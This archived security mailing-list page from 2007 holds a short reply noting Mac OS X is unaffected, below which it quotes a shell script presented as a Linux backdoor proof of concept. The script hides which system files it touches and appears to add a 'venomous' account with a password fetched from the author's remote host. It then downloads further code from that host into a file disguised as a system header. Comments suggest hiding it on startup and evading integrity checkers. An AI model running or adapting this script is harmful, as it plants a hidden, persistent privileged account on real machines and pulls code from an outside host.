Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-disclosure] Linux big bang theory....

from [Just1n T1mberlake] Network Security [Permanent Link]
Subject: Re: [Full-disclosure] Linux big bang theory....
Date: Mon, 14 May 2007 08:47:39 +0800 
Confirmed Macosx is not vulnerable to this.

just1n

--
NeXT is one of my best friends, Love & Sincerity

Mac OS X Evangelist
Public Relations of NeXus



----- Original Message -----
From: "J. Oquendo" <sil@infiltrated.net>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>
Subject: [Full-disclosure] Linux big bang theory....
Date: Wed, 09 May 2007 17:42:52 -0400


Enjoy||Complain

# !/bin/sh
# Venomous
# Linux PoC backdoor keeper...
# http://www.infiltrated.net/ubuntuDestruction.php
# J. Oquendo (c) 05/09/2007 # If you have to ask you shouldn't run 
this password for venomous
# is password


happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
sed -n '1p' $happy|awk -F ":" 
'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F 
":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, 
""){print $4" -a"}'`
echo "Enter your email address" ; read ans ; where=$ans
$who | $what $where


# Ugly method too keep a rootaccount Follows... For those not in the know...
# Venomous was an idea made to prove a point, not give script kiddiots another
# tool to be morons with. Instead of ruining things, how about solving...
# Instead of naysaying... Prove me wrong


# Pick a ranDumb file in /usr/includes/ then create the samevbackdoor on the
# system using this filename. Do something sneaky on your own to place this
# file on a startup I could show you, but then I would have to kill -9 you

# Note the location... Highly doubtable to remove an actual include file
# unless some stupid admin did something really dumb... Before someone mouths
# around via e-mail... I could have written this all inclusively but I chose
# not to for obvious reasons...

random=`date|awk -F : '{print $3}'|awk '{print $1}'`
echo $random > /tmp/secCommand
sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' 
/tmp/secCommand|sed -n '1p'`
rm /tmp/secCommand
filename=`echo $sad|sh|awk -F . '{print $1}'`

lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n 
'226,233p' >> /usr/local/include/$filename.h

# Now of course I could have modified this to replicate any one of the files
# on startup but again... PoC ... The naysayers will ramble on about "You're
# out of your mind..." Am I? I've given you the PoC's what more do you want...
# Ubuntu or any Linux for the lowly home user is a horrible idea...

# And AGAIN before someone fires off "I would see the URL and that's a dead
# giveaway!" ... Look, I'm trying to make a point here... I "could 
have" # a functioning backdoor undetectable to most integrity 
checkers, Samhain,
# Tripwire etc., but why should I disclose this anywhere. It's not in the
# best interest of anyone to do so... Don't bother asking for it via email
# because it's not public and will never be...

# This again... Was to prove a point to the naysayers who this shit doesn't
# happen... Keep dreaming. Its only a matter of time before you guys go
# Goo Goo about getting Linux for Idjits off the ground, but its a horrible
# mistake in the making


-- ====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' "Wise men talk because they 
have something to say;
fools, because they have to say something." -- Plato
<< smime.p7s >>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/







-- 
_______________________________________________
Get a free @hellokitty.com, @mymelody.com, or @kuririnmail.com email account
today at www.sanriotown.com, and enjoy 500MB of storage!
Check out our official blog @ http://blog.hellokitty.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-disclosure] MyBB version 1.2.4 Multiple Path Disclosure Vulnerabilities, SecurityResearch
Next by Date:  Re: [Full-disclosure] Linux big bang theory...., Valdis . Kletnieks
Previous by Thread:  Re: [Full-disclosure] Linux big bang theory...., Pavel Kankovsky
Next by Thread:  Re: [Full-disclosure] Linux big bang theory...., Valdis . Kletnieks
Indexes:  [Date] [Thread] [Top] [All Lists]